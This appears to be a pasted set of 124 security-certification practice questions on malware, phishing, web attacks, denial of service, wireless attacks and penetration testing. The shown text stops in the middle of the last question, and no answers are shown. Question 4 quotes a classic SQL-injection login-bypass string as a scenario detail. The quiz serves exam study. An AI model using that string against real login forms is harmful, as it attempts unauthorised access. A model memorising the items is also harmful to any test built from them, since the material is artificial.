Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1. John is analyzing strange behavior on computers in his network. He believes there is mal-
- ware on the machines. The symptoms include strange behavior that persists, even if he
- boots the machine to a Linux Live CD. What is the most likely cause?
- A. Ransomware
- B. Boot sector virus
- C. Rootkit
- D. Key logger
- 2. Ahmed is a sales manager with a major insurance company. He has received an email that
- is encouraging him to click on a link and fill out a survey. He is suspicious of the email,
- but it does mention a major insurance association, and that makes him think it might be
- legitimate. Which of the following best describes this attack?
- A. Phishing
- B. Social engineering
- C. Spear phishing
- D. Trojan horse
- 3. You are a security administrator for a medium-sized bank. You have discovered a piece of
- software on your bank’s database server that is not supposed to be there. It appears that
- the software will begin deleting database files if a specific employee is terminated. What
- best describes this?
- A. Worm
- B. Logic bomb
- C. Trojan horse
- D. Rootkit
- 4. You are responsible for incident response at Acme bank. The Acme bank website has been
- attacked. The attacker used the login screen, but rather than enter login credentials, he or
- she entered some odd text: ' or '1' = '1. What is the best description for this attack?
- A. Cross-site scripting
- B. Cross-site request forgery
- C. SQL injection
- D. ARP poisoning
- 5. Juanita is a network administrator for a small accounting firm. The users on her network
- are complaining of slow connectivity. When she examines the firewall logs, she observes a
- large number of half-open connections. What best describes this attack?
- A. DDoS
- B. SYN flood
- C. Buffer overflow
- D. ARP poisoning
- 6. Frank is deeply concerned about attacks to his company’s e-commerce server. He is par
- ticularly worried about cross-site scripting and SQL injection. Which of the following
- would best defend against these two specific attacks?
- A. Encrypted web traffic
- B. Filtering user input
- C. A firewall
- D. An IDS
- 7. You are responsible for network security at Acme Company. Users have been reporting
- that personal data is being stolen when using the wireless network. They all insist they
- only connect to the corporate wireless access point (WAP). However, logs for the WAP
- show that these users have not connected to it. Which of the following could best explain
- this situation?
- A. Session hijacking
- B. Clickjacking
- C. Rogue access point
- D. Bluejacking
- 8. What type of attack depends on the attacker entering JavaScript into a text area that is
- intended for users to enter text that will be viewed by other users?
- A. SQL injection
- B. Clickjacking
- C. Cross-site scripting
- D. Bluejacking
- 9. A sales manager at your company is complaining about slow performance on his com-
- puter. When you thoroughly investigate the issue, you find spyware on his computer. He
- insists that the only thing he has downloaded recently was a freeware stock trading appli-
- cation. What would best explain this situation?
- A. Logic bomb
- B. Trojan horse
- C. Rootkit
- D. Macro virus
- 10. Your company outsourced development of an accounting application to a local program-
- ming firm. After three months of using the product, one of your accountants accidently
- discovers a way to log in and bypass all security and authentication. What best describes
- this?
- A. Logic bomb
- B. Trojan horse
- C. Backdoor
- D. Rootkit
- 11. Teresa is the security manager for a mid-sized insurance company. She receives a call
- from law enforcement, telling her that some computers on her network participated in a
- massive denial-of-service (DoS) attack. Teresa is certain that none of the employees at her
- company would be involved in a cybercrime. What would best explain this scenario?
- A. It is a result of social engineering.
- B. The machines all have backdoors.
- C. The machines are bots.
- D. The machines are infected with crypto-viruses.
- 12. Mike is a network administrator with a small financial services company. He has received
- a popup window that states his files are now encrypted and he must pay .5 bitcoins to get
- them decrypted. He tries to check the files in question, but their extensions have changed,
- and he cannot open them. What best describes this situation?
- A. Mike’s machine has a rootkit.
- B. Mike’s machine has ransomware.
- C. Mike’s machine has a logic bomb.
- D. Mike’s machine has been the target of whaling.
- 13. Terrance is examining logs for the company e-commerce web server. He discovers a num-
- ber of redirects that cannot be explained. After carefully examining the website, he finds
- some attacker performed a watering hole attack by placing JavaScript in the website and is
- redirecting users to a phishing website. Which of the following techniques would be best
- at preventing this in the future?
- A. An SPI firewall
- B. An active IDS/IPS
- C. Checking buffer boundaries
- D. Checking user input
- 14. What type of attack is based on sending more data to a target variable than the data can
- actually hold?
- A. Bluesnarfing
- B. Buffer overflow
- C. Bluejacking
- D. DDoS
- 15. You have been asked to test your company network for security issues. The specific test
- you are conducting involves primarily using automated and semiautomated tools to look
- for known vulnerabilities with the various systems on your network. Which of the follow-
- ing best describes this type of test?
- A. Vulnerability scan
- B. Penetration test
- C. Security audit
- D. Security test
- 16. Jared discovers that attackers have breached his WiFi network. They have gained access
- via the wireless access point (WAP) administrative panel, and have logged on with the
- credentials the WAP shipped with. What best describes this issue?
- A. Default configuration
- B. Race conditions
- C. Failure to patch
- D. Weak encryption
- 17. Joanne is concerned about social engineering. She is particularly concerned that this tech-
- nique could be used by an attacker to obtain information about the network, including
- possibly even passwords. What countermeasure would be most effective in combating
- social engineering?
- A. SPI firewall
- B. An IPS
- C. User training
- D. Strong policies
- 18. You are responsible for incident response at a mid-sized bank. You have discovered that
- someone was able to successfully breach your network and steal data from your database
- server. All servers are configured to forward logs to a central logging server. However,
- when you examine that central log, there are no entries after 2:13 a.m. two days ago. You
- check the servers, and they are sending logs to the right server, but they are not getting
- there. Which of the following would be most likely to explain this?
- A. Your log server has a backdoor.
- B. Your log server has been hit with a buffer overflow attack.
- C. Your switches have been hit with ARP poisoning.
- D. Your IDS is malfunctioning and blocking log transmissions.
- 19. Coleen is the web security administrator for an online auction website. A small number
- of users are complaining that when they visit the website and log in, they are told the ser-
- vice is down and to try again later. Coleen checks and she can visit the site without any
- problem, even from computers outside the network. She also checks the web server log
- and there is no record of those users ever connecting. Which of the following might best
- explain this?
- A. Typosquatting
- B. SQL injection
- C. Cross-site scripting
- D. Cross-site request forgery
- 20. Mahmoud is responsible for managing security at a large university. He has just per-
- formed a threat analysis for the network, and based on past incidents and studies of
- similar networks, he has determined that the most prevalent threat to his network is
- low-skilled attackers who wish to breach the system, simply to prove they can or for
- some low-level crime, such as changing a grade. Which term best describes this type of
- attacker?
- A. Hacktivist
- B. Amateur
- C. Insider
- D. Script kiddie
- 21. Which of the following best describes a collection of computers that have been compro-
- mised and are being controlled from one central point?
- A. Zombienet
- B. Botnet
- C. Nullnet
- D. Attacknet
- 22. John is conducting a penetration test of a client’s network. He is currently gathering infor-
- mation from sources such as archive.org, netcraft.com, social media, and information
- websites. What best describes this stage?
- A. Active reconnaissance
- B. Passive reconnaissance
- C. Initial exploitation
- D. Pivot
- 23. One of the salespeople in your company reports that his computer is behaving sluggishly.
- You check but don’t see any obvious malware. However, in his temp folder you find JPEGs
- that look like screenshots of his desktop. Which of the following is the most likely cause?
- A. He is stealing data from the company.
- B. There is a backdoor on his computer.
- C. There is spyware on his computer.
- D. He needs to update his Windows.
- 24. What type of attack is based on entering fake entries into a target networks domain name
- server?
- A. DNS poisoning
- B. ARP poisoning
- C. Bluesnarfing
- D. Bluejacking
- 25. Frank has been asked to conduct a penetration test of a small bookkeeping firm. For the
- test, he has only been given the company name, the domain name for their website, and
- the IP address of their gateway router. What best describes this type of test?
- A. White-box test
- B. External test
- C. Black-box test
- D. Threat test
- 26. You work for a security company that performs penetration testing for clients. You are
- conducting a test of an e-commerce company. You discover that after compromising the
- web server, you can use the web server to launch a second attack into the company’s inter-
- nal network. What best describes this?
- A. Internal attack
- B. White-box testing
- C. Black-box testing
- D. A pivot
- 27. While investigating a malware outbreak on your company network, you discover some-
- thing very odd. There is a file that has the same name as a Windows system DLL, and
- even has the same API interface, but handles input very differently, in a manner to help
- compromise the system, and it appears that applications have been attaching to this file,
- rather than the real system DLL. What best describes this?
- A. Shimming
- B. Trojan horse
- C. Backdoor
- D. Refactoring
- 28. Your company has hired a penetration testing firm to test the network. For the test, you
- have given the company details on operating systems you use, applications you run, and
- network devices. What best describes this type of test?
- A. White-box test
- B. External test
- C. Black-box test
- D. Threat test
- 29. Frank is a network administrator for a small college. He discovers that several machines
- on his network are infected with malware. That malware is sending a flood of packets to
- a target external to the network. What best describes this attack?
- A. SYN flood
- B. DDoS
- C. Botnet
- D. Backdoor
- 30. John is a salesman for an automobile company. He recently downloaded a program
- from an unknown website, and now his client files have their file extensions changed,
- and he cannot open them. He has received a popup window that states his files are now
- encrypted and he must pay .5 bitcoins to get them decrypted. What has happened?
- A. His machine has a rootkit.
- B. His machine has a logic bomb.
- C. His machine has a boot sector virus.
- D. His machine has ransomware.
- 31. When phishing attacks are so focused that they target a specific individual, they are called
- what?
- A. Spear phishing
- B. Targeted phishing
- C. Phishing
- D. Whaling
- 32. You are concerned about a wide range of attacks that could affect your company’s web
- server. You have recently read about an attack wherein the attacker sends more data to the
- target than the target is expecting. If done properly, this could cause the target to crash.
- What would best prevent this type of attack?
- A. An SPI firewall
- B. An active IDS/IPS
- C. Checking buffer boundaries
- D. Checking user input
- 33. You work for a large retail company that processes credit card purchases. You have been
- asked to test your company network for security issues. The specific test you are conduct-
- ing involves primarily checking policies, documentation, and past incident reports. Which
- of the following best describes this type of test?
- A. Vulnerability scan
- B. Penetration test
- C. Security audit
- D. Security test
- 34. Maria is a salesperson with your company. After a recent sales trip, she discovers that
- many of her logins have been compromised. You carefully scan her laptop and cannot find
- any sign of any malware. You do notice that she had recently connected to a public WiFi
- at a coffee shop, and it is only since that connection that she noticed her logins had been
- compromised. What would most likely explain what has occurred?
- A. She connected to a rogue AP.
- B. She downloaded a Trojan horse.
- C. She downloaded spyware.
- D. She is the victim of a buffer overflow attack.
- 35. You are the manager for network operations at your company. One of the accountants
- sees you in the hall and thanks you for your team keeping his antivirus software up to
- date. When you ask him what he means, he mentions that one of your staff, named Mike,
- called him and remotely connected to update the antivirus. You don’t have an employee
- named Mike. What has occurred?
- A. IP spoofing
- B. MAC spoofing
- C. Man-in-the-middle attack
- D. Social engineering
- 36. You are a security administrator for a bank. You are very interested in detecting any
- breaches or even attempted breaches of your network, including those from internal per-
- sonnel. But you don’t want false positives to disrupt work. Which of the following devices
- would be the best choice in this scenario?
- A. IPS
- B. WAF
- C. SIEM
- D. IDS
- 37. One of your users cannot recall the password for their laptop. You want to recover that
- password for them. You intend to use a tool/technique that is popular with hackers, and
- it consists of searching tables of precomputed hashes to recover the password. What best
- describes this?
- A. Rainbow table
- B. Backdoor
- C. Social engineering
- D. Dictionary attack
- 38. You have noticed that when in a crowded area, you sometimes get a stream of unwanted
- text messages. The messages end when you leave the area. What describes this attack?
- A. Bluejacking
- B. Bluesnarfing
- C. Evil twin
- D. Rogue access point
- 39. Someone has been rummaging through your company’s trash bins seeking to find docu-
- ments, diagrams, or other sensitive information that has been thrown out. What is this
- called?
- A. Dumpster diving
- B. Trash diving
- C. Social engineering
- D. Trash engineering
- 40. You have noticed that when in a crowded area, data from your cell phone is stolen. Later
- investigation shows a Bluetooth connection to your phone, one that you cannot explain.
- What describes this attack?
- A. Bluejacking
- B. Bluesnarfing
- C. Evil twin
- D. RAT
- 41. Louis is investigating a malware incident on one of the computers on his network. He
- has discovered unknown software that seems to be opening a port, allowing someone to
- remotely connect to the computer. This software seems to have been installed at the same
- time as a small shareware application. Which of the following best describes this malware?
- A. RAT
- B. Backdoor
- C. Logic bomb
- D. Rootkit
- 42. This is a common security issue that is extremely hard to control in large environments.
- It occurs when a user has more computer rights, permissions, and privileges than what is
- required for the tasks the user needs to perform. What best describes this scenario?
- A. Excessive rights
- B. Excessive access
- C. Excessive permissions
- D. Excessive privileges
- 43. Jared is responsible for network security at his company. He has discovered behavior on
- one computer that certainly appears to be a virus. He has even identified a file he thinks
- might be the virus. However, using three separate antivirus programs, he finds that none
- can detect the file. Which of the following is most likely to be occurring?
- A. The computer has a RAT.
- B. The computer has a zero-day exploit.
- C. The computer has a logic bomb.
- D. The computer has a rootkit.
- 44. There are some computers on your network that use Windows XP. They have to stay on
- Windows XP due to a specific application they are running. That application won’t run on
- newer operating systems. What security concerns does this situation give you?
- A. No special concerns; this is normal.
- B. The machines cannot be patched; XP is no longer supported.
- C. The machines cannot coordinate with an SIEM since XP won’t support that.
- D. The machines are more vulnerable to DoS attacks.
- 45. Farès has discovered that attackers have breached his wireless network. They seem to have
- used a brute-force attack on the WiFi-protected setup PIN to exploit the WAP and recover
- the WPA2 password. What is this attack called?
- A. Evil twin
- B. Rogue WAP
- C. IV attack
- D. WPS Attack
- 46. Your wireless network has been breached. It appears the attacker modified a portion of
- data used with the stream cipher and utilized this to expose wirelessly encrypted data.
- What is this attack called?
- A. Evil twin
- B. Rogue WAP
- C. IV attack
- D. WPS Attack
- 47. John is concerned about disgruntled employees stealing company documents and exfiltrat-
- ing them from the network. He is looking for a solution that will detect likely exfiltration
- and block it. What type of system is John looking for?
- A. IPS
- B. SIEM
- C. Honeypot
- D. Firewall
- 48. Some users on your network use Acme Bank for their personal banking. Those users have
- all recently been the victim of an attack, wherein they visited a fake Acme Bank website
- and their logins were compromised. They all visited the bank website from your network,
- and all of them insist they typed in the correct URL. What is the most likely explanation
- for this situation?
- A. Trojan horse
- B. IP spoofing
- C. Clickjacking
- D. DNS poisoning
- 49. Users are complaining that they cannot connect to the wireless network. You discover
- that the WAPs are being subjected to a wireless attack designed to block their WiFi signals.
- Which of the following is the best label for this attack?
- A. IV attack
- B. Jamming
- C. WPS attack
- D. Botnet
- 50. What type of attack involves users clicking on something different on a website than what
- they intended to click on?
- A. Clickjacking
- B. Bluesnarfing
- C. Bluejacking
- D. Evil twin
- 51. What type of attack exploits the trust that a website has for an authenticated user to
- attack that website by spoofing requests from the trusted user?
- A. Cross-site scripting
- B. Cross-site request forgery
- C. Bluejacking
- D. Evil twin
- 52. John is a network administrator for Acme Company. He has discovered that someone
- has registered a domain name that is spelled just one letter different than his company’s
- domain. The website with the misspelled URL is a phishing site. What best describes this
- attack?
- A. Session hijacking
- B. Cross-site request forgery
- C. Typosquatting
- D. Clickjacking
- 53. Frank has discovered that someone was able to get information from his smartphone
- using a Bluetooth connection. The attacker was able to get his contact list and some
- emails he had received. What is this type of attack called?
- A. Bluesnarfing
- B. Session hijacking
- C. Backdoor attack
- D. CSRF
- 54. Juanita is a network administrator for Acme Company. Some users complain that they
- keep getting dropped from the network. When Juanita checks the logs for the wireless
- access point (WAP), she finds that a deauthentication packet has been sent to the WAP
- from the users’ IP addresses. What seems to be happening here?
- A. Problem with users’ WiFi configuration
- B. Disassociation attack
- C. Session hijacking
- D. Backdoor attack
- 55. John has discovered that an attacker is trying to get network passwords by using software
- that attempts a number of passwords from a list of common passwords. What type of
- attack is this?
- A. Dictionary
- B. Rainbow table
- C. Brute force
- D. Session hijacking
- 56. You are a network security administrator for a bank. You discover that an attacker has
- exploited a flaw in OpenSSL and forced some connections to move to a weak cipher suite
- version of TLS, which the attacker could breach. What type of attack was this?
- A. Disassociation attack
- B. Downgrade attack
- C. Session hijacking
- D. Brute force
- 57. When an attacker tries to find an input value that will produce the same hash as a pass-
- word, what type of attack is this?
- A. Rainbow table
- B. Brute force
- C. Session hijacking
- D. Collision attack
- 58. Farès is the network security administrator for a company that creates advanced routers
- and switches. He has discovered that his company’s networks have been subjected to a
- series of advanced attacks over a period of time. What best describes this attack?
- A. DDoS
- B. Brute force
- C. APT
- D. Disassociation attack
- 59. You are responsible for incident response at Acme Company. One of your jobs is to
- attempt to attribute attacks to a specific type of attacker. Which of the following would
- not be one of the attributes you consider in attributing the attack?
- A. Level of sophistication
- B. Resources/funding
- C. Intent/motivation
- D. Amount of data stolen
- 60. John is running an IDS on his network. Users sometimes report that the IDS flags legiti-
- mate traffic as an attack. What describes this?
- A. False positive
- B. False negative
- C. False trigger
- D. False flag
- 61. You are performing a penetration test of your company’s network. As part of the test, you
- will be given a login with minimal access and will attempt to gain administrative access
- with this account. What is this called?
- A. Privilege escalation
- B. Session hijacking
- C. Root grabbing
- D. Climbing
- 62. Mary has discovered that a web application used by her company does not always handle
- multithreading properly, particularly when multiple threads access the same variable.
- This could allow an attacker who discovered this vulnerability to exploit it and crash the
- server. What type of error has Mary discovered?
- A. Buffer overflow
- B. Logic bomb
- C. Race conditions
- D. Improper error handling
- 63. An attacker is trying to get access to your network. He is sending users on your network
- a link to a freeware stock-monitoring program. However, that stock-monitoring program
- has attached to it software that will give the attacker access to any machine that it is
- installed on. What type of attack is this?
- A. Rootkit
- B. Trojan horse
- C. Spyware
- D. Boot sector virus
- 64. Acme Company uses its own internal certificate server for all internal encryption.
- However, their certificate authority only publishes a CRL once per week. Does this
- pose a danger, and if so what?
- A. Yes, this means a revoked certificate could be used for up to seven days.
- B. No, this is standard for all certificate authorities.
- C. Yes, this means it would be easy to fake a certificate.
- D. No, since this is being used only internally.
- 65. When a program has variables, especially arrays, and does not check the boundary values
- before inputting data, what attack is the program vulnerable to?
- A. XSS
- B. CRSF
- C. Buffer overflow
- D. Logic bomb
- 66. Which of the following best describes malware that will execute some malicious activity
- when a particular condition is met (i.e., if condition is met, then execute)?
- A. Boot sector virus
- B. Logic bomb
- C. Buffer overflow
- D. Sparse infector virus
- 67. Gerald is a network administrator for Acme Company. Users are reporting odd behavior
- on their computers. He believes this may be due to malware, but the behavior is different
- on different computers. What might best explain this?
- A. It is not malware, but hardware failure.
- B. It is a boot sector virus.
- C. It is a macro virus.
- D. It is a polymorphic virus.
- 68. Teresa is a security officer at ACME Inc. She has discovered an attack where the attacker
- sent multiple broadcast messages to the network routers, spoofing an IP address of one of
- the network servers. This caused the network to send a flood of packets to that server and
- it is no longer responding. What is this attack called?
- A. Smurf attack
- B. DDoS attack
- C. TCP hijacking attack
- D. TCP SYN flood attack
- 69. Which type of virus is able to alter its own code to avoid being detected by antivirus soft-
- ware?
- A. Boot sector
- B. Hoax
- C. Polymorphic
- D. Stealth
- 70. Gerald is a network administrator for a small financial services company. Users are
- reporting odd behavior that appears to be caused by a virus on their machines. After iso-
- lating the machines that he believes are infected, Gerald analyzes them. He finds that all
- the infected machines received an email purporting to be from accounting, with an Excel
- spreadsheet, and the users opened the spreadsheet. What is the most likely issue on these
- machines?
- A. A macro virus
- B. A boot sector virus
- C. A Trojan horse
- D. A RAT
- 71. Fred is on the incident response team for a major insurance company. His specialty is
- malware analysis. He is studying a file that is suspected of being a virus that infected the
- company network last month. The file seems to intermittently have bursts of malicious
- activity, interspersed with periods of being dormant. What best describes this malware?
- A. A macro virus
- B. A logic bomb
- C. A sparse infector virus
- D. A polymorphic virus
- 72. What is the term used to describe a virus that can infect both program files and boot
- sectors?
- A. Polymorphic
- B. Multipartite
- C. Stealth
- D. Multiple encrypting
- 73. Your company has hired an outside security firm to perform various tests of your net-
- work. During the vulnerability scan you will provide that company with logins for vari-
- ous systems (i.e., database server, application server, web server, etc.) to aid in their scan.
- What best describes this?
- A. A white-box test
- B. A gray-box test
- C. A privileged scan
- D. An authenticated user scan
- 74. Which of the following is commonly used in a distributed denial of service (DDoS) attack?
- A. Phishing
- B. Adware
- C. Botnet
- D. Trojan
- 75. You are investigating a recent breach at Acme Company. You discover that the attacker
- used an old account of someone no longer at the company. The account was still active.
- Which of the following best describes what caused this vulnerability to exist?
- A. Improperly configured accounts
- B. Untrained users
- C. Using default configuration
- D. Failure to patch systems
- 76. Juan is responsible for incident response at a large financial institution. He discovers that
- the company WiFi has been breached. The attacker used the same login credentials that
- ship with the wireless access point (WAP). The attacker was able to use those credentials
- 21
- to access the WAP administrative console and make changes. Which of the following best
- describes what caused this vulnerability to exist?
- A. Improperly configured accounts
- B. Untrained users
- C. Using default configuration
- D. Failure to patch systems
- 77. Elizabeth is investigating a network breach at her company. She discovers a program that
- was able to execute code within the address space of another process by using the target
- process to load a specific library. What best describes this attack?
- A. Logic bomb
- B. Session hijacking
- C. Buffer overflow
- D. DLL injection
- 78. Zackary is a malware investigator with a cybersecurity firm. He is investigating malware
- that is able to compromise a target program by finding null references in the target pro-
- gram and dereferencing them, causing an exception to be generated. What best describes
- this type of attack?
- A. DLL injection
- B. Buffer overflow
- C. Memory leak
- D. Pointer dereference
- 79. Frank has just taken over as CIO of a mid-sized insurance company. One of the first
- things he does is order a thorough inventory of all network equipment. He discovers two
- routers that are not documented. He is concerned that if they are not documented, they
- might not be securely configured, tested, and safe. What best describes this situation?
- A. Poor user training
- B. System sprawl
- C. Failure to patch systems
- D. Default configuration
- 80. What is the primary difference between an intrusive and a nonintrusive vulnerability
- scan?
- A. An intrusive scan is a penetration test.
- B. A nonintrusive scan is just a document check.
- C. An intrusive scan could potentially disrupt operations.
- D. A nonintrusive scan won’t find most vulnerabilities.
- 81. Daryl is investigating a recent breach of his company’s web server. The attacker used
- sophisticated techniques and then defaced the website, leaving messages that were
- denouncing the company’s public policies. He and his team are trying to determine the
- type of actor who most likely committed the breach. Based on the information provided,
- who was the most likely threat actor?
- A. A script
- B. A nation-state
- C. Organized crime
- D. Hacktivists
- 82. When investigating breaches and attempting to attribute them to specific threat actors,
- which of the following is not one of the indicators of an APT?
- A. Long-term access to the target
- B. Sophisticated attacks
- C. The attack comes from a foreign IP address.
- D. The attack is sustained over time.
- 83. What type of attack uses a second wireless access point (WAP) that broadcasts the same
- SSID as a legitimate access point, in an attempt to get users to connect to the attacker’s
- WAP?
- A. Evil twin
- B. IP spoofing
- C. Trojan horse
- D. MAC spoofing
- 84. You are investigating a breach of a large technical company. You discover that there have
- been several different attacks over a period of a year. The attacks were sustained, each
- lasting several weeks of continuous attack. The attacks were somewhat sophisticated and
- originated from a variety of IP addresses, but all the IP addresses are within your country.
- Which threat actor would you most suspect of being involved in this attack?
- A. Nation-state
- B. Hacktivist
- C. Script kiddie
- D. A lone highly skilled hacker
- 85. Which of the following best describes a zero-day vulnerability?
- A. A vulnerability that has been known to the vendor for zero days
- B. A vulnerability that has not yet been breached
- C. A vulnerability that can be quickly exploited (i.e., in zero days)
- D. A vulnerability that will give the attacker brief access (i.e., zero days)
- 86. You have discovered that there are entries in your network’s domain name server that
- point legitimate domains to unknown and potentially harmful IP addresses. What best
- describes this type of attack?
- A. A backdoor
- B. An APT
- C. DNS poisoning
- D. A Trojan horse
- 87. What best describes an attack that attaches some malware to a legitimate program so that
- when the user installs the legitimate program, they inadvertently install the malware?
- A. Backdoor
- B. Trojan horse
- C. RAT
- D. Polymorphic virus
- 88. Which of the following best describes software that will provide the attacker with remote
- access to the victim’s machine, but that is wrapped with a legitimate program in an
- attempt to trick the victim into installing it?
- A. RAT
- B. Backdoor
- C. Trojan horse
- D. Macro virus
- 89. Which of the following is an attack that seeks to attack a website, based on the website’s
- trust of an authenticated user?
- A. XSS
- B. CSRF
- C. Buffer overflow
- D. RAT
- 90. John is analyzing what he believes is a malware outbreak on his network. Many users
- report their machines are behaving strangely. The anomalous behavior seems to occur
- sporadically and John cannot find a pattern. What is the most likely cause?
- A. APT
- B. Boot sector virus
- C. Sparse infector virus
- D. Key logger
- 91. Farès is the CISO of a bank. He has received an email that is encouraging him to click on
- a link and fill out a survey. Being security conscious, he normally does not click on links.
- However, this email calls him by name and claims to be a follow-up to a recent conference
- he attended. Which of the following best describes this attack?
- A. Clickjacking
- B. Social engineering
- C. Spear phishing
- D. Whaling
- 92. You are responsible for technical support at your company. Users are all complaining of
- very slow Internet connectivity. When you examine the firewall, you find a large num-
- ber of incoming connections that are not completed, all packets coming from a single IP
- address. What best describes this attack?
- A. DDoS
- B. SYN flood
- C. Buffer overflow
- D. ARP poisoning
- 93. An attacker is trying to get malformed queries sent to the backend database to circumvent
- the web page’s security. What type of attack depends on the attacker entering text into
- text boxes on a web page that is not normal text, but rather odd-looking commands that
- are designed to be inserted into database queries?
- A. SQL injection
- B. Clickjacking
- C. Cross-site scripting
- D. Bluejacking
- 94. Tyrell is responsible for selecting cryptographic products for his company. The company
- wants to encrypt the drives of all laptops. The product they have selected uses 128-bit
- AES encryption for full disk encryption, and users select a password to decrypt the drive.
- What, if any, would be the major weakness in this system?
- A. None; this is a good system.
- B. The 128-bit AES key is too short.
- C. The passwords users select are the weak link.
- D. The AES algorithm is the problem; they should use DES.
- 95. Valerie is responsible for security testing applications in her company. She has discovered
- that a web application, under certain conditions, can generate a memory leak. What, type
- of attack would this leave the application vulnerable to?
- A. DoS
- B. Backdoor
- C. SQL injection
- D. Buffer overflow
- 96. When a multithreaded application does not properly handle various threads accessing a
- common value, what flaw is this?
- A. Memory leak
- B. Buffer overflow
- C. Integer overflow
- D. Race condition
- 97. Acme Company is using smart cards that use near-field communication (NFC) rather than
- needing to be swiped. This is meant to make physical access to secure areas more secure.
- What vulnerability might this also create?
- A. Tailgating
- B. Eavesdropping
- C. IP spoofing
- D. Race conditions
- 98. John is responsible for physical security at a large manufacturing plant. Employees all use
- a smart card in order to open the front door and enter the facility. Which of the following
- is a common way attackers would circumvent this system?
- A. Phishing
- B. Tailgating
- C. Spoofing the smart card
- D. RFID spoofing
- 99. Which of the following is the term for an attack wherein malware inserts itself as a
- library, such as a DLL, between an application and the real system library the application
- is attempting to communicate with?
- A. Application spoofing
- B. Jamming
- C. Evil twin
- D. Shimming
- 100. You are responsible for incident response at Acme Corporation. You have discovered that
- someone has been able to circumvent the Windows authentication process for a specific
- network application. It appears that the attacker took the stored hash of the password and
- sent it directly to the backend authentication service, bypassing the application. What type
- of attack is this?
- A. Hash spoofing
- B. Evil twin
- C. Shimming
- D. Pass the hash
- 101. A user in your company reports that she received a call from someone claiming to be from
- the company technical support team. The caller stated that there was a virus spreading
- through the company and he needed immediate access to the employee’s computer to stop
- it from being infected. What social-engineering principles did the caller use to try to trick
- the employee?
- A. Urgency and intimidation
- B. Urgency and authority
- C. Authority and trust
- D. Intimidation and authority
- 102. Ahmed has discovered that someone has manipulated tables in one of the company’s
- switches. The manipulation has changed the tables so that data destined for one specific
- MAC address will now be routed elsewhere. What type of attack is this?
- A. ARP poisoning
- B. DNS poisoning
- C. Man-in-the-middle
- D. Backdoor
- 103. You are investigating incidents at Acme Corporation and have discovered malware on sev-
- eral machines. It appears that this malware infects system files in the Windows/System32/
- directory and also affects the boot sector. What type of malware is this?
- A. Multipartite
- B. Boot sector
- C. Macro virus
- D. Polymorphic virus
- 104. What type of attack uses Bluetooth to access the data from a cell phone when in range?
- A. Phonejacking
- B. Bluejacking
- C. Bluesnarfing
- D. Evil twin
- 105. An attacker is using a table of precomputed hashes in order to try to get a Windows pass-
- word. What type of technique is being used?
- A. Dictionary
- B. Brute force
- C. Pass the hash
- D. Rainbow table
- 106. Carlos works in incident response for a mid-sized bank. Users inform him that internal
- network connections are fine, but connecting to the outside world is very slow. Carlos
- reviews logs on the external firewall and discovers tens of thousands of ICMP packets
- coming from a wide range of different IP addresses. What type of attack is occurring?
- A. Smurf
- B. DoS
- C. DDoS
- D. SYN flood
- 107. What type of attack is it when the attacker attempts to get the victim’s communication to
- abandon a high-quality/secure mode in favor of a lower-quality/less secure mode?
- A. Downgrade
- B. Brute force
- C. Rainbow table
- D. Bluesnarfing
- 108. What type of penetration test is being done when the tester is given extensive knowledge
- of the target network?
- A. White-box
- B. Full disclosure
- C. Black-box
- D. Red team
- 109. Your company is instituting a new security awareness program. You are responsible for
- educating end users on a variety of threats, including social engineering. Which of the fol-
- lowing best defines social engineering?
- A. Illegal copying of software
- B. Gathering information from discarded manuals and printouts
- C. Using people skills to obtain proprietary information
- D. Phishing emails
- 110. Which of the following attacks can be caused by a user being unaware of their physical
- surroundings?
- A. ARP poisoning
- B. Phishing
- C. Shoulder surfing
- D. Smurf attack
- 111. Francine is a network administrator for Acme Corporation. She has noticed that one of
- the servers is now unreachable. After carefully reviewing various logs, she discovers that a
- large number of broadcast packets were sent to the network router, spoofing the server’s IP
- address. What type of attack is this?
- A. SYN flood
- B. ICMP flood
- C. Buffer overflow
- D. Smurf attack
- 112. An attacker enters code into a text box on a website. That text box is used for product
- reviews. The attacker wants his code to execute the next time a visitor visits that page.
- What is this attack called?
- A. SQL injection
- B. Logic bomb
- C. Cross-site scripting
- D. Session hijacking
- 113. A user is redirected to a different website when the user requests the DNS record
- www.xyz.com. Which of the following is this an example of?
- A. DNS poisoning
- B. DoS
- C. DNS caching
- D. Smurf attack
- 114. Tom is the network administrator for a small accounting firm. As soon as he comes in to
- work, users report to him that they cannot connect to the network. After investigating,
- Tom discovers that none of the workstations can connect to the network and all have an
- IP address in the form of 169.254.x.x. What has occurred?
- A. Smurf attack
- B. Man-in-the-middle attack
- C. DDoS
- D. DHCP starvation
- 115. Which of the following would most likely use a group of bots to stop a web server from
- accepting new requests?
- A. DoS
- B. DDoS
- C. Buffer overflow
- D. Trojan horse
- 116. Which of the following would a former employee most likely plant on a server before leav-
- ing to cause disruption to the network?
- A. Worm
- B. Logic bomb
- C. Trojan
- D. Virus
- 117. A SYN flood is a DoS attack in which an attacker deliberately violates the three-way
- handshake and opens a large number of half-open TCP connections. The signature of a
- SYN flood attack is:
- A. The source and destination address having the same value
- B. The source and destination port numbers having the same value
- C. A large number of SYN packets appearing on a network without the corresponding
- ACK packets
- D. A large number of SYN packets appearing on a network with the corresponding
- reply RST
- 118. What does white-box testing mean?
- A. The tester has full knowledge of the environment.
- B. The tester has no knowledge of the environment.
- C. The tester has permission to access the system.
- D. The tester has no permission to access the system.
- 119. Ahmed has been hired to perform a penetration test of Acme Corporation. He begins by
- looking at IP address ranges owned by the company and details of domain name registra-
- tion. He also visits social media and newsgroups to see if they contain any sensitive infor-
- mation or have any technical details online. Within the context of penetration-examining
- methodology, what phase is Ahmed conducting?
- A. Passive information gathering
- B. Active information gathering
- C. Initial exploitation
- D. Vulnerability scanning
- 120. Mary works for a large insurance company, on their cybersecurity team. She is investigat-
- ing a recent incident and discovers that a server was breached using an authorized user’s
- account. After investigating the incident further, Mary believes that the authorized user
- logged on, and then someone else took over their session. What best describes this attack?
- A. Man-in-the-middle
- B. Session hijacking
- C. Backdoor
- D. Smurf attack
- 121. Which of the following type of testing utilizes an automated process of proactively identi-
- fying vulnerabilities of the computing systems present on a network?
- A. Security audit
- B. Vulnerability scanning
- C. White-box test
- D. Black-box test
- 122. What type of attack is an NFC most susceptible to?
- A. Eavesdropping
- B. Man-in-the-middle
- C. Buffer overflow
- D. Smurf attack
- 123. John has been asked to do a penetration test of a company. He has been given general
- information but no details about the network. What kind of test is this?
- A. Gray-box
- B. White-box
- C. Partial
- D. Masked
- 124. Under which type of attack does an attacker’s system appear to be the server to the real
- client and appear to be the client to the real server?
- A. Denial of service
- B. Replay
